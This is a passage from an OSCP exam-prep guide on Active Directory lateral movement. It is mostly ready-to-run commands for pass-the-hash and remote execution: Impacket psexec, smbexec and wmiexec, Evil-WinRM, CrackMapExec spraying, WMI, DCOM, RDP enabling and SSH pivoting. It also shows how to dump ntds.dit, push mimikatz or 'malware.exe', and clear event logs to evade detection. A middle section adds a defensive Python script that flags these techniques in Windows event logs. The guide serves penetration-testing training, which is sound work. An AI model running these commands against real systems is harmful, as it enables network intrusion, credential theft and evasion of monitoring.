# Lateral Movement
After gaining initial access, you need to move through the network to reach high-value targets. Lateral movement is essential for the OSCP AD set.
## Understanding Lateral Movement

Lateral Movement Flow:

```text
Initial Access ──> Credential Harvest ──> Move to Next Host ──> Repeat
      │                    │                        │
      └── Low-priv user    └── Dump hashes/creds     └── Admin access
```
## PsExec Variants

### Impacket psexec.py

```bash
# With password
psexec.py corp.local/administrator:password@$TARGET

# With NTLM hash
psexec.py -hashes :NTHASH corp.local/administrator@$TARGET

# Execute specific command
psexec.py corp.local/administrator:password@$TARGET "whoami"
```

### Impacket smbexec.py

```bash
# Stealthier than psexec (no binary upload)
smbexec.py corp.local/administrator:password@$TARGET

# With hash
smbexec.py -hashes :NTHASH corp.local/administrator@$TARGET
```

### Impacket wmiexec.py

```bash
# Uses WMI (even stealthier)
wmiexec.py corp.local/administrator:password@$TARGET

# With hash
wmiexec.py -hashes :NTHASH corp.local/administrator@$TARGET
```
### Comparison

| Tool | Method | Artifacts | Detection |
|---|---|---|---|
| psexec.py | SMB + service | Binary on disk | High |
| smbexec.py | SMB + batch file | Fewer artifacts | Medium |
| wmiexec.py | WMI | No disk write | Low |
| atexec.py | Task Scheduler | Scheduled task | Medium |
## Evil-WinRM

The go-to tool for interactive shells over Windows Remote Management (WinRM).

```bash
# With password
evil-winrm -i $TARGET -u administrator -p 'password'

# With hash
evil-winrm -i $TARGET -u administrator -H NTHASH

# With Kerberos ticket (realm given with -r, ticket taken from the ccache)
evil-winrm -i $TARGET -r corp.local

# Upload/download files (from the Evil-WinRM prompt)
*Evil-WinRM* PS> upload /tmp/mimikatz.exe
*Evil-WinRM* PS> download C:\Windows\NTDS\ntds.dit
```
## CrackMapExec Lateral Movement

### Execute Commands

```bash
# Execute command
crackmapexec smb $TARGET -u admin -p 'password' -x "whoami"

# Execute PowerShell
crackmapexec smb $TARGET -u admin -p 'password' -X "Get-Process"

# Multiple targets
crackmapexec smb $NETWORK/24 -u admin -p 'password' -x "hostname"
```

### Spray and Move

```bash
# Find where you have admin
crackmapexec smb $NETWORK/24 -u user -p 'password'
# Pwn3d! indicates admin access

# Then execute on those hosts
crackmapexec smb 192.168.1.10 -u user -p 'password' -x "whoami"
```
## Windows Native Tools

### PowerShell Remoting

```powershell
# Enable PSRemoting (if admin)
Enable-PSRemoting -Force

# Enter remote session
Enter-PSSession -ComputerName TARGET -Credential corp\admin

# Execute command remotely
Invoke-Command -ComputerName TARGET -Credential corp\admin -ScriptBlock {whoami}

# Run on multiple computers
Invoke-Command -ComputerName SRV1,SRV2,SRV3 -ScriptBlock {hostname}
```

### WMI

```cmd
:: Execute process via WMI
wmic /node:TARGET /user:administrator /password:password process call create "cmd.exe /c whoami > C:\result.txt"
```

```powershell
# PowerShell variant ($cred is a PSCredential object, e.g. from Get-Credential)
Invoke-WmiMethod -ComputerName TARGET -Credential $cred -Class Win32_Process -Name Create -ArgumentList "cmd.exe /c whoami"
```

### PsExec (Sysinternals)

```cmd
:: Execute command
psexec \\TARGET -u corp\admin -p password cmd.exe

:: Execute as SYSTEM
psexec \\TARGET -u corp\admin -p password -s cmd.exe

:: Copy and execute file
psexec \\TARGET -u corp\admin -p password -c malware.exe
```
## RDP Lateral Movement

### Enabling RDP

```powershell
# Enable RDP
Set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server' -Name "fDenyTSConnections" -Value 0

# Allow through firewall
Enable-NetFirewallRule -DisplayGroup "Remote Desktop"
```

### Using xfreerdp (Linux)

```bash
# Connect with password
xfreerdp /u:administrator /p:password /v:$TARGET

# Connect with hash (Restricted Admin mode required)
xfreerdp /u:administrator /pth:NTHASH /v:$TARGET

# Full screen
xfreerdp /u:administrator /p:password /v:$TARGET /f
```

### SharpRDP

```powershell
# RDP execution without GUI
.\SharpRDP.exe computername=TARGET command="cmd.exe /c whoami" username=corp\admin password=password
```
## SSH (Linux Targets)

```bash
# With password
ssh user@$TARGET

# With key
ssh -i id_rsa user@$TARGET

# Port forward through pivot
ssh -L 8080:internal-target:80 user@pivot
```
## DCOM Lateral Movement

```powershell
# Using DCOM (less common, good for evasion)
$com = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","TARGET"))
$com.Document.ActiveView.ExecuteShellCommand("cmd",$null,"/c calc.exe","Minimized")
```
## Lateral Movement Detection Avoidance

```text
OPSEC Tips:
├── Prefer wmiexec over psexec (fewer artifacts)
├── Use native Windows tools when possible
├── Clear event logs selectively (if needed)
├── Use legitimate admin tools (PowerShell remoting)
└── Time attacks during business hours
```
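The Artifacts and Detection columns in the comparison table are what a detection engineer keys on, so here is the defender's side of that table and of the OPSEC list above: a small Python triage script, added here as an example and not part of the original cheat sheet, that maps Windows event log records to the techniques in this section (service installs for the PsExec family, scheduled tasks for atexec, shell processes spawned under WmiPrvSE.exe, wsmprovhost.exe or mmc.exe for the WMI, WinRM/PowerShell Remoting and DCOM methods) and flags the one-account-to-many-hosts network logon pattern that the CrackMapExec "Spray and Move" check leaves behind. The event records, hostnames, account names, addresses and timestamps are constructed samples, and the `classify`, `analyze` and `spray_candidates` functions and their technique labels are this example's own heuristics, not a vendor's rule set.

```python
"""Triage Windows event records for the lateral-movement artifacts in this section.
Added defender-side example: the events are CONSTRUCTED samples shaped like
Windows System/Security log records; the technique labels are this script's own."""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = [
    # Sysinternals PsExec: well-known service name (7045, System log).
    {"EventID": 7045, "Channel": "System", "Computer": "SRV1", "Time": "2024-01-15T10:02:11",
     "ServiceName": "PSEXESVC", "ImagePath": r"%SystemRoot%\PSEXESVC.exe"},
    # Service whose binary path is a shell one-liner: smbexec-style, nothing uploaded.
    {"EventID": 7045, "Channel": "System", "Computer": "SRV2", "Time": "2024-01-15T10:05:40",
     "ServiceName": "ZyXwVu", "ImagePath": r"%COMSPEC% /Q /c echo hostname > \\127.0.0.1\C$\__out"},
    # Scheduled task created (4698): atexec.py-style.
    {"EventID": 4698, "Channel": "Security", "Computer": "SRV4", "Time": "2024-01-15T10:09:30",
     "SubjectUserName": "admin", "TaskName": r"\LpKqRtWe"},
    # Process creation (4688): cmd.exe under the WMI provider host.
    {"EventID": 4688, "Channel": "Security", "Computer": "SRV5", "Time": "2024-01-15T10:11:05",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\wbem\WmiPrvSE.exe"},
    # Process creation: cmd.exe under mmc.exe (DCOM MMC20.Application).
    {"EventID": 4688, "Channel": "Security", "Computer": "SRV6", "Time": "2024-01-15T10:12:44",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\System32\mmc.exe"},
    # Process creation: powershell.exe under the WinRM plugin host.
    {"EventID": 4688, "Channel": "Security", "Computer": "SRV7", "Time": "2024-01-15T10:13:10",
     "NewProcessName": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentProcessName": r"C:\Windows\System32\wsmprovhost.exe"},
    # Benign: a user opening cmd.exe from Explorer on a workstation.
    {"EventID": 4688, "Channel": "Security", "Computer": "WS1", "Time": "2024-01-15T10:14:00",
     "NewProcessName": r"C:\Windows\System32\cmd.exe",
     "ParentProcessName": r"C:\Windows\explorer.exe"},
    # Network logons (4624, type 3): one account reaching four hosts from one source in 12 s.
    *[{"EventID": 4624, "Channel": "Security", "Computer": host, "Time": t, "LogonType": 3,
       "TargetUserName": "user", "IpAddress": "10.10.10.5"}
      for host, t in [("SRV1", "2024-01-15T10:20:00"), ("SRV2", "2024-01-15T10:20:03"),
                      ("SRV3", "2024-01-15T10:20:07"), ("SRV4", "2024-01-15T10:20:12")]],
    # Ordinary single network logon by another account.
    {"EventID": 4624, "Channel": "Security", "Computer": "FS1", "Time": "2024-01-15T10:25:00",
     "LogonType": 3, "TargetUserName": "jdoe", "IpAddress": "10.10.20.14"},
]

SHELL_PREFIXES = ("%comspec%", "cmd.exe", "cmd ", "powershell")
SHELL_CHILDREN = {"cmd.exe", "powershell.exe"}
# Parent processes that host remotely initiated command execution.
PARENT_TECHNIQUE = {
    "wmiprvse.exe": "WMI process creation (wmiexec.py / wmic / Invoke-WmiMethod)",
    "wsmprovhost.exe": "WinRM / PowerShell Remoting (Evil-WinRM, Invoke-Command)",
    "mmc.exe": "DCOM MMC20.Application ExecuteShellCommand",
}

def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Technique label for one event, or None if the event is not of interest."""
    eid = ev["EventID"]
    if eid == 7045:  # service installed: the core PsExec-family artifact
        name, path = ev.get("ServiceName", ""), ev.get("ImagePath", "").strip().lower()
        if name.upper() == "PSEXESVC":
            return "Sysinternals PsExec service install"
        if path.startswith(SHELL_PREFIXES):
            return "smbexec-style service (binary path is a shell one-liner)"
        return "remote service install running an executable (psexec.py-style; review)"
    if eid == 4698:
        return "scheduled task created (atexec.py-style)"
    if eid == 4688 and basename(ev.get("NewProcessName", "")) in SHELL_CHILDREN:
        return PARENT_TECHNIQUE.get(basename(ev.get("ParentProcessName", "")))
    return None

def analyze(events):
    """Per-event findings as (host, technique label, evidence) tuples, in input order."""
    return [(ev["Computer"], classify(ev), f"EventID {ev['EventID']} in {ev['Channel']}")
            for ev in events if classify(ev)]

def spray_candidates(events, min_hosts=3, window=timedelta(minutes=5)):
    """Accounts whose type-3 logons reached >= min_hosts distinct hosts inside one window:
    the footprint left by checking admin access across a whole subnet."""
    by_user = defaultdict(list)
    for ev in events:
        if ev["EventID"] == 4624 and ev.get("LogonType") == 3:
            by_user[ev["TargetUserName"]].append((datetime.fromisoformat(ev["Time"]), ev["Computer"]))
    hits = {}
    for user, logons in by_user.items():
        logons.sort()
        for i, (start, _) in enumerate(logons):  # slide the window over each logon
            hosts = {h for t, h in logons[i:] if t - start <= window}
            if len(hosts) >= min_hosts:
                hits[user] = sorted(hosts)
                break
    return hits

if __name__ == "__main__":
    for host, label, evidence in analyze(SAMPLE_EVENTS):
        print(f"{host:5} {evidence:24} {label}")
    print("spray candidates:", spray_candidates(SAMPLE_EVENTS))
```

Run it directly to print one finding per artifact plus the spray candidate. In a real environment the same logic sits over 7045 (System) and 4688/4698/4624 (Security) records exported from a SIEM; 4688 only exists where process-creation auditing is enabled, and the parent-process match depends on the Creator Process Name field being populated, which is exactly the gap the "use native tools" and "fewer artifacts" tips above are trying to exploit.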
## Lateral Movement Workflow

```text
1. Identify targets with BloodHound
   └── Find shortest path to DA
2. Check admin access
   └── crackmapexec smb TARGETS -u user -p pass
3. Move to accessible hosts
   └── evil-winrm, wmiexec, psexec
4. Harvest credentials
   └── mimikatz, secretsdump
5. Repeat with new credentials
   └── Expand access until DA reached
```
## Quick Reference

| Scenario | Tool | Command |
|---|---|---|
| Have password | evil-winrm | `evil-winrm -i TARGET -u user -p pass` |
| Have NTLM hash | wmiexec | `wmiexec.py -hashes :HASH domain/user@TARGET` |
| Have Kerberos ticket | psexec | `psexec.py -k -no-pass domain/user@TARGET` |
| Check admin access | crackmapexec | `crackmapexec smb TARGETS -u user -p pass` |
| RDP access | xfreerdp | `xfreerdp /u:user /p:pass /v:TARGET` |
Next, we'll cover exam strategy and practice scenarios for the OSCP exam.